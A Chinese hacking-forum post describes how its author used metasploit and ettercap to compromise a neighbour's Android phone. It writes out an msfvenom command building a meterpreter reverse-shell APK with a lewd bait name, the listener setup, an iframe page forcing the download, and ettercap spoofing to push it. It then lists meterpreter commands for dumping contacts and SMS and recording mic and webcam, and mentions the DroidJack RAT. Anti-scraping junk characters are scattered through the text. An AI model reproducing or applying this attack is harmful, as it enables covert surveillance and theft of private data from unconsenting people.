找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
返回列表 发新帖
查看: 2875|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, `$ j# m+ j4 C" p. F1 p 五、msf+ettercap入侵邻居安卓手机 5 U) y/ P. E* b! K) w5 [

* S5 g6 l A7 e- P, x2 d. |2 I

/ x1 _1 v/ f; w$ ]' t3 M 首先启动msf % Z1 ~" ~( Y! ~3 v6 c

1 x* B. |0 K# u5 {5 _* \

( {; r- R# b0 p3 `% M T/ j% m 先用kali生成一个安卓木马,如下命令: Q0 n/ T# W, |9 V# a3 n/ v

3 Y3 I: u7 w% n2 {( ]+ @8 K- J8 t

s! _* I! a0 m$ k2 d Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk * J: _9 G; S' f( H9 I4 ^ j; p

; J$ O9 h1 p" W9 ^, r

7 c/ q7 e9 D3 ^% g2 h 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 % p) ^" Q1 e% _6 e5 Q) o

3 }+ O" J0 G& H% }+ ~2 i

8 K/ P \6 o- R, T" h 然后进入msf & h2 L1 _% N6 a& ]" D& \7 j6 n

/ L2 Z+ S9 X. [. L6 S4 h2 C8 U

% n1 n/ @4 m" U5 [* A* y use exploit/multi/handler ! o7 P% X$ L0 X$ J

' K/ B8 S- Z7 b8 O9 G

$ u! e0 m3 L& ^: `0 B5 \; g6 \& \ set payload android/meterpreter/reverse_tcp U& y9 r2 E1 E, O" h3 ^ I' [ y

1 m$ W( X- R, @ M( ~

u; M- M3 W+ R: y% L: w& }3 N% } set LHOST 192.168.0.109 //ipkailiip 5 q+ J0 P8 Z8 L( y+ n& l

0 a, X& j f U" L5 y6 X1 E& W

& W: C! Y9 Y. P8 F* K/ x& y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 t$ s9 o" s9 ^, s6 S, m; x! x" N

) @* O# r" |! O# H$ _

% f$ _+ ]# R- a7 M Exploit ; ]2 d* B$ c4 I

7 H; k9 ?# d: k: }# L

5 g/ \9 W' ~7 v* `+ ]) j, F, z/ t   8 R7 [, ]' l# q; T( w/ r5 C

3 Z6 b: E; |2 Y c2 |3 n

+ B3 {3 W/ [% b2 v, ^' L8 \; Z 下面我们开启ettercap -G 5 s8 ]; T* R& b& g* p0 m! B( k! n

: B9 |/ Z/ L! ?) h6 b

+ E' V- N% t+ z) y0 a% P. e4 Z 我物理IP 6 b6 M! {' b* p; i! d0 E7 x

$ f: R+ d: E, H0 ]" @: l# Z/ B) R$ T

6 m) j1 U. K7 P- z   , n8 s1 A7 [0 c9 W! c2 J

) l9 y8 F; |0 b/ l& x

, j- g' u4 [; [ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 0 w$ c; Z0 T+ a2 K- ?$ Q

2 Z; @5 G% P) l3 E

* F: J1 i! m! ^* _! I 下面我们来设置一下 ' g- }) k, j% V; E5 v& h4 r

, m) X( N8 Y8 q7 a# u% u

; z$ i. o; T. S% ]# d   , h; G3 r6 F# s& Z

' R6 y* V+ `3 I" _- r2 W

: s! s" R) M( Y' G X' y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 h: W) a* H, P8 x2 E: A

1 n, p8 _# M. d5 {6 P8 o9 Z. B0 L

: M T$ ]' s9 ?; h4 v# M1 Y% R   : S9 U' v9 x$ g& G% b0 z z

( m/ f; _) C, A, I' E

; }/ a _ p' T8 c0 [   S5 B( S# b2 i+ y' d- J8 a1 O

4 J/ B2 E" { j% N

5 W5 V# ~( W! V& ]   9 `+ S( G f/ G4 C! l4 x; N" U2 g( x

6 y; Y4 r8 `+ |

3 M% I$ O% Q: j) k# \: B/ [   % q) K& R" ]$ k$ c

6 D- |) Y) ?8 G5 M B8 p" z

1 x& w, G' d6 l+ l   0 T- s9 G- m9 O+ ` s4 B$ ` U

8 ?2 G; l/ A# |

/ o1 ^: }. ^/ l, |+ @# g S   ; Q. V# A; Z0 Q3 i. F% R+ k2 m; @

7 k+ I' e X$ h/ b

- @8 C$ e2 c5 a& _- Q5 ^% q, a) H% z' H   0 V: o5 K& m% W& ^) `! T, Q' u

, B4 w/ g+ A% m1 h

5 c5 R1 g8 q5 o5 M8 @0 N   # M* t: X- C* d5 R" e2 I

+ N# x/ n3 ?- f% R- {* a' A

8 O9 p; U; K% V: Y+ B$ M- g y3 [3 _   + E, ]1 W0 O: W: r& J% x

" J! n% t" @) k, F0 x9 @2 R1 ^

8 E, }" D# S* L3 M- ~9 V   4 Y1 P$ y6 Q' O& Y8 \, \ s* _

- I: R8 A% \8 y) Z2 [& w

4 \: ?, f- @+ G* b8 w8 r B; K Z   . M. I# D6 z2 |1 Y/ ]. {, Y! p

0 x0 ~, W* O, ]" `7 Q: T- Y

$ y* ?* Z! F/ N- t" d   / I. r6 p# L/ O$ K! @% p/ P, [6 H: @

2 a& g3 [7 m1 C4 h6 q5 ^4 n

7 S4 ?! C0 ^; a, j4 K3 ~   * l2 J% Z: Y! M2 G8 U. p7 M4 S

6 ]( l/ U$ y, B% I& ~8 w% s# n! i

- D* Q0 ^ f. \. e$ r 下面我们开始攻击 ; m3 _' n: _2 T

; T5 x7 _4 t: f/ f

' H5 m( A' q3 k5 j. p2 ~3 {+ r3 [% ~   9 _* m. e% O, ?' j) G) G2 h2 J

5 q5 _! d% z0 p. N9 _! I ~

1 j/ E* g- H) x. r   + ?* L' m+ c- D2 l! _! P

* Y- ?: x0 B* \0 Z; d y

" a2 [, x3 f- {   & Q) u, f& i- P& j+ T

7 P! r# U3 L I5 }" J0 k

6 Q3 b' G; n6 G; p   5 ?/ D8 l9 w' m

) x6 ~1 i7 F" e" M" L: s& E) ]* l, Y( n

- e8 C" c8 I2 e Z   : _6 |; c5 y: m+ q; ^: \7 f" A

- n. m. T4 a: s$ I# a6 S1 g

! v1 n( d0 ?/ i _ 大概过了5分钟多,发现反弹成功了 & a# K1 Q; z4 t% V2 k

5 c6 y' T6 n' X( w# z

h& Q$ z2 b8 g' N* x3 _   9 K; x! h* |/ Q, R7 _

# U2 X) d( J! r! ?( `8 ?- e8 r6 h

3 A$ v* i- E" W" W6 }0 I- `   4 P* s- z; n7 @( D% p5 }6 T

$ [& u, b/ w2 @+ d3 I

. v/ r/ Q$ Z6 V$ t& n8 b   E8 e: J- O3 A% ~0 T# k

. K8 Q& a" f: b

9 X8 X$ L/ o1 e4 n. c. Q   6 x4 A; Q6 G \/ j

$ F- H3 P* C) s1 G

: ?6 n9 ?9 T! e   ! D* a4 l+ j* |2 l8 i" I# D" \# y

: O+ G8 ^/ X7 G

6 ]6 O/ `6 H, [: ^1 A* H   6 ^ K5 F1 G& u9 V9 T# R" q! |

# F' x) i7 ]' R$ _0 ~

- D& p3 v+ k" A' j& L" X   8 q1 {6 V% ?, @& N( F

+ |2 s+ b* G) [. p2 z

6 d( l* l5 E2 i0 S# a 执行命令 1 Z" N- `9 R9 _" L* ]( @) V' C. G; P

. Q! i% ]& Z+ C/ L! r' K5 G

* g1 P2 @2 \0 W% X   / n' d" }4 u+ B

# b( q/ V v( r% Y" I5 t9 U3 f

# C! k- P v* L$ ?, I' |0 Y7 { dump_contacts    --》这个是导出电话 ! m* o9 o! u* c) N

9 C4 Q( ?+ _- B9 e

- C, q0 p4 A9 z0 j& I& X dump_sms --》这个是导出信息 [( c; d$ v8 S# u/ D) Q/ h* m) |

% [, ^# T i1 i

. L: p L8 d+ W9 ^9 G record_mic     Record audio from the default microphone for X seconds $ u2 Q, m$ @! B0 V$ e, I

4 Q: O3 y- ^% B3 W% W9 j5 Y6 ] a/ x5 z- K

' a/ S. @+ T+ L" E" P: N. w2 M     webcam_chat    Start a video chat 0 \! _! K' [+ d( ^1 `( l

& k P2 [; w# k8 U

0 H h! r, n/ \$ z3 h. \: E     webcam_list    List webcams 3 k: n" g" e9 s' O# u

9 r9 F) O3 e# F" I

" ^) v3 G a% ]6 e$ X9 J     webcam_snap    Take a snapshot from the specified webcam : c5 P9 {1 l( T* k

8 L' O* O* D5 k' d0 w5 T

2 i8 d6 P7 ~ q webcam_stream  lay a video stream from the specified webcam / I8 b( y' e+ e' z, ?

, M% g' ?; H/ c

8 q+ Q$ | p, i2 r   0 C" C& |, [3 {) A# \# J( f

6 m1 F e) x9 u* x6 `" x2 e2 A

' Y3 k( m" R' h3 P   ' p& K3 s: W0 G1 `

; m5 L1 f9 W) M( {) I

4 L, ~4 x- w& d/ N- a# V( Q 我们打开看一下电话薄, 1 o" Z) f5 M& D/ X# U: p" K& }9 I

9 D" _* B4 S$ Y. w X, m* N

! n# ^: {; u M3 y+ ~   3 I% p5 y, D+ a8 m

; [ i$ W1 T2 e T3 ]! \" Y

g! ]( S' N/ e* y, b6 _2 q' Y3 s   " X0 ]0 N* s; z. f9 v

5 N. r h R1 T3 p

9 S, X7 f4 w1 ~+ T. v& `( o) T, W$ r" m7 O   3 p$ K6 `4 s2 D* O$ [

% N, \$ A/ m8 ^

8 Z6 \5 v0 L( ^/ L( _   ; Y) U2 D, P& O) L- j, V* n

! d% d7 u1 s7 Q- W

! A9 y! n1 w9 p" z   / P. H0 x: T: I5 |0 W2 N- s2 @

1 k. f* G1 ^ B; [+ N

1 m% w; r5 Y! X   : W( X+ i2 {! I! ?% V6 ~2 M

0 l2 ~- y7 @ E: t* U3 C

$ X) H5 I+ L' B" l 我们同时欺骗成DroidJack木马,使用方法如图: * r: p; J$ }3 I

/ i; F% [; C4 N* A2 F7 I$ U

7 f6 W" ]( l+ n8 a. S   * M* ~, @. D5 j+ S1 ~; L+ h

' q- }4 y, @" W/ _* a3 c3 G8 {8 K: Y

$ A s8 \1 U( X( z+ Z   : {3 ]. @& N1 K! Q

) w( l5 X7 i- T' D R1 P3 ?

4 \: B. S, k2 x" e   / D: H3 ^; f( m

6 v: h( ^* f0 U. [3 u8 O, k

' D3 j+ U7 ~+ z9 {' _ 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ' v4 T# L8 |- `* R( N

, }6 D* d" J6 u3 s# a0 A, ~

+ x$ x/ i( y/ i) Y   9 U. u0 ?/ p1 y! b! W

. \0 i9 D" q, ~! y7 j3 |

! L! ^/ Q( i" j4 t) m   " t" }. O* ~1 R+ ^1 \, R# b; ? c

0 D6 |8 _: l; c) x0 R# G1 E- l

; f" ]$ ?3 x% a6 s9 E   ) w* \, G6 x7 t( R' O

8 U. D6 B! {4 u; x$ t

6 v- k& x0 A' l' r* X/ B5 w, Q% s 1 g0 p' A/ |* i5 U9 P7 a% ?% ^# A

% r: @+ f* y- V/ v5 o( Q( O

' Q2 f- j" X3 {) Z& [$ L- P
6 f; _* a* U2 o; e( m

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表